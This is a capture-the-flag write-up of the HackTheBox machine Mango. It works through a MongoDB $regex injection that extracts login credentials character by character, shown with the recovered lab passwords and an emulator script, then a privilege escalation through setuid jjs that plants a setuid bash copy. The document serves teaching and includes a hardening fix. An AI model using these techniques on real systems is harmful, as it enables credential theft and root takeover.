
Today's writeup is on Mango, a medium-difficulty Linux box released on October 26th, 2019 on HackTheBox.
If you have VIP access on the website, you can find it here: https://www.hackthebox.eu/home/machines/profile/214
Recon
Using nmap, we look for open ports.
nmap -A -p- -T4 10.10.10.162
We are using basic nmap arguments here:
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : lets you adjust the timing template (according to your bandwidth and how fast you want the scan to be)
The results are as follows:
┌─|Log_s [18:31] :~
└──╼ $ nmap -A -p- -T4 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 18:31 CEST
Nmap scan report for 10.10.10.162
Host is up (0.10s latency).
Not shown: 65351 closed ports, 181 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 885.64 seconds
Nothing unusual stands out: SSH and HTTP(S) on their standard ports. Note the commonName in the TLS certificate, though; we will come back to it.
Next step of recon is to take a look at it in a web browser.

On port 80 we get a 403 Forbidden. According to our scan, the next one to try is port 443, by entering the following in the browser's address bar:
https://10.10.10.162:443

Now things get interesting. We know we are in a lab environment, but let's look at the certificate anyway: self-signed certificates often leak internal hostnames in their subject.

The certificate's commonName gives us a hostname: staging-order.mango.htb. Apache picks the virtual host from the Host header, so we add it (and the parent domain) to our /etc/hosts file:
echo "10.10.10.162 mango.htb staging-order.mango.htb" | sudo tee -a /etc/hosts
Now let's see what is going on by navigating to http://staging-order.mango.htb.

We've got ourselves a login form, served by a vhost that the bare IP address refused with a 403. That's about it for the recon on this box.
Own User
For the first part, the box's name and the picture on the login form are big hints: there is a high probability that the credentials are stored in MongoDB.
A bit of research turns up a NoSQL injection script that enumerates usernames and passwords one character at a time, by injecting MongoDB query operators such as $regex through the form fields: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
We try the example command from its README (-up and -pp name the username and password parameters, -ep the parameter to enumerate, -op the other fields the form expects), and it works.
┌─|Log_s [19:25] :~
└──╼ $ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
We do the same for the passwords, changing -ep username to -ep password:
┌─|Log_s [19:25] :~
└──╼ $ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
We now have two usernames, admin and mango, and two passwords, h3mXK8RhU~f{]f5H and t9KcS3>!0B#2. Keep in mind that the script enumerates each field on its own, so it does not tell us which password belongs to which user; we have to try the combinations.
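To make explicit what the script is doing, here is an added example of my own (not the tool's code and not the box's backend) that emulates the login handler in JavaScript. A constructed two-document users collection stands in for MongoDB, a vulnerable handler passes the decoded form fields straight into the query, a hardened one refuses anything that is not a plain string, and extractAll rebuilds every matching value one character at a time with $regex, which is the behaviour the output above shows. The field names, the $regex/$ne emulation and the assumption that the backend decodes password[$regex]=... into an operator object are mine; the user data is made up.

```javascript
// Added example: emulation of the login form's MongoDB lookup and of the
// character-by-character extraction the enumeration script performs.
// USERS is a constructed stand-in collection, not the box's real data.
const USERS = [
  { username: "admin", password: "s3cret!A" },
  { username: "mango", password: "pa55w0rd" },
];

// Printable ASCII, the candidate set for each position.
const ALPHABET =
  "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" +
  "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~";

// Minimal MongoDB matcher: plain equality, plus the $regex and $ne operators.
function matches(value, cond) {
  if (cond !== null && typeof cond === "object") {
    if ("$regex" in cond) return new RegExp(cond.$regex).test(value);
    if ("$ne" in cond) return value !== cond.$ne;
    return false;
  }
  return value === cond;
}

// Vulnerable handler (assumed backend shape): a PHP-style body parser turns
// `password[$regex]=^a` into an array, which lands unchanged in the query.
function vulnerableLogin(username, password) {
  return USERS.some((u) => matches(u.username, username) && matches(u.password, password));
}

// Hardened handler: refuse anything that is not a plain string before querying.
function hardenedLogin(username, password) {
  if (typeof username !== "string" || typeof password !== "string") return false;
  return USERS.some((u) => u.username === username && u.password === password);
}

function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// What one probe looks like on the wire (login/submit are the form's own fields).
function formFields(username, passwordCond) {
  const fields = { username, login: "login", submit: "submit" };
  if (passwordCond !== null && typeof passwordCond === "object") {
    for (const [op, val] of Object.entries(passwordCond)) fields[`password[${op}]`] = val;
  } else {
    fields.password = passwordCond;
  }
  return fields;
}

// Depth-first extraction of every value of `target` ("username" or "password")
// whose document also satisfies `otherCond` on the other field. Each probe is
// one login attempt; an anchored `^prefix$` probe confirms a complete value.
function extractAll(login, target, otherCond, prefix = "", maxLen = 32) {
  const probe = (re) =>
    target === "username" ? login({ $regex: re }, otherCond) : login(otherCond, { $regex: re });
  const found = [];
  if (prefix && probe("^" + escapeRegex(prefix) + "$")) found.push(prefix);
  if (prefix.length >= maxLen) return found;
  for (const c of ALPHABET) {
    if (probe("^" + escapeRegex(prefix + c))) {
      found.push(...extractAll(login, target, otherCond, prefix + c, maxLen));
    }
  }
  return found;
}
```

Run it with node. Enumerating with $ne on the other field, as the script does, returns all values of a field without saying which document each came from; fixing the username instead (extractAll(vulnerableLogin, "password", "mango")) is what pairs a password with its user. The cost is roughly alphabet size times value length, so a 16-character password is on the order of 1500 requests against the real form. hardenedLogin is the fix: a type check before the query (or, in PHP, casting the field to string) stops operator injection entirely, including the classic {$ne: ""} login bypass.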
Let's try SSH with those credentials. We are unable to log in as admin, but mango works!
┌─|Log_s [19:25] :~
└──╼ $ ssh mango@10.10.10.162
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Apr 17 14:36:00 UTC 2020
System load: 0.21 Processes: 116
Usage of /: 26.0% of 19.56GB Users logged in: 1
Memory usage: 12% IP address for ens33: 10.10.10.162
Swap usage: 4%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 17 14:21:31 2020 from 10.10.14.205
mango@mango:~$
Unfortunately, the user.txt file is located in /home/admin. But that's not a problem, given we have the required credentials.
mango@mango:~$ su admin
Password:
$ whoami
admin
$
Now a simple cat /home/admin/user.txt and the flag appears.
Privesc (Own Root)
For the second part, we start with the well-known enumeration script LinEnum.sh and find an interesting SUID file that we can exploit.
[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
jjs is the command-line launcher for Nashorn, the JavaScript engine bundled with the JDK: it evaluates JavaScript from a file or from standard input, and that JavaScript can call any Java API. The mode bits are the important part. -rwsr-sr-- with owner root and group admin means the binary is setuid root and setgid admin, but only root and members of the admin group may execute it: the mango user, unless it is in that group, cannot use it at all, while admin can. Whatever we feed to jjs therefore runs with an effective UID of 0.
There are two ways to finish. The first is to use the JavaScript prompt (or a script file) to read /root/root.txt through the Java file APIs and print it.
The other way (I suck at JS) is to pass the flag file itself as the script argument. jjs will try to parse the flag as JavaScript, fail, and its syntax error message will most likely echo the offending line, which is the flag.
$ /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs /root/root.txt
And here is our root flag!
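For the first route, here is an added example script of my own (not from the writeup) to feed to jjs. It assumes the script is saved as /tmp/root.js and run as admin with the full path to the setuid jjs. The top half is plain JavaScript that parses the LinEnum line above and answers the "who can run this?" question with Linux's owner/group/other rule; the bottom half needs the Java object that only Nashorn provides, so it is skipped when the file is loaded by anything other than jjs. Nashorn in JDK 11 only speaks ES5, hence the var and function style.

```javascript
// Added example (not from the writeup): a Nashorn script for jjs, plus a plain
// JavaScript check of who may execute the setuid binary LinEnum reported.
// Run on the box as admin (assumed location of this file):
//   /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs /tmp/root.js

// The LinEnum line from the writeup, path spelled as it is on disk (amd64).
var JJS_LINE = "-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs";

// Split one `ls -l` line into the bits that matter for "can I run this?".
// Positions 3/6/9 of the mode string are the owner/group/other execute slots;
// 's' there means execute plus setuid/setgid, 'S' means the bit without execute.
function parseLsLine(line) {
  var f = line.trim().split(/\s+/);
  var m = f[0];
  return {
    mode: m, owner: f[2], group: f[3], path: f[f.length - 1],
    setuid: m.charAt(3) === "s" || m.charAt(3) === "S",
    setgid: m.charAt(6) === "s" || m.charAt(6) === "S",
    ownerExec: m.charAt(3) === "x" || m.charAt(3) === "s",
    groupExec: m.charAt(6) === "x" || m.charAt(6) === "s",
    otherExec: m.charAt(9) === "x" || m.charAt(9) === "t"
  };
}

// Linux checks exactly one class of bits: owner if you own the file, else group
// if you are in its group, else other. There is no fall-through.
function canExecute(entry, user, groups) {
  if (user === entry.owner) return entry.ownerExec;
  if (groups.indexOf(entry.group) !== -1) return entry.groupExec;
  return entry.otherExec;
}

// --- Nashorn-only part: `Java` exists under jjs, not under Node -------------

// Read a file through java.nio; thanks to the setuid bit this runs with euid 0.
function readAsRoot(path) {
  var Files = Java.type("java.nio.file.Files");
  var Paths = Java.type("java.nio.file.Paths");
  return new java.lang.String(Files.readAllBytes(Paths.get(path)), "UTF-8");
}

// Persistent root shell: copy bash and mark the copy setuid. `bash -p` keeps
// euid 0 instead of dropping to the real uid. Afterwards run: /tmp/rootbash -p
function rootShell() {
  var ProcessBuilder = Java.type("java.lang.ProcessBuilder");
  var cmd = "cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash";
  var p = new ProcessBuilder("/bin/bash", "-p", "-c", cmd).inheritIO().start();
  return p.waitFor(); // 0 on success
}

if (typeof Java !== "undefined") {
  print(readAsRoot("/root/root.txt"));
}
```

readAsRoot works because nothing in the JVM drops the effective UID that the setuid bit granted at exec time. rootShell is there for when one file is not enough: bash -p keeps euid 0 rather than resetting it to the real uid, and a setuid copy of bash outlives the jjs session (remove it when you are done). The permission check is the caveat worth remembering from this box: a SUID binary that is only group-executable is useless until you are in that group, which is why the hop to admin matters.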
Thanks for reading, see you for another writeup 😉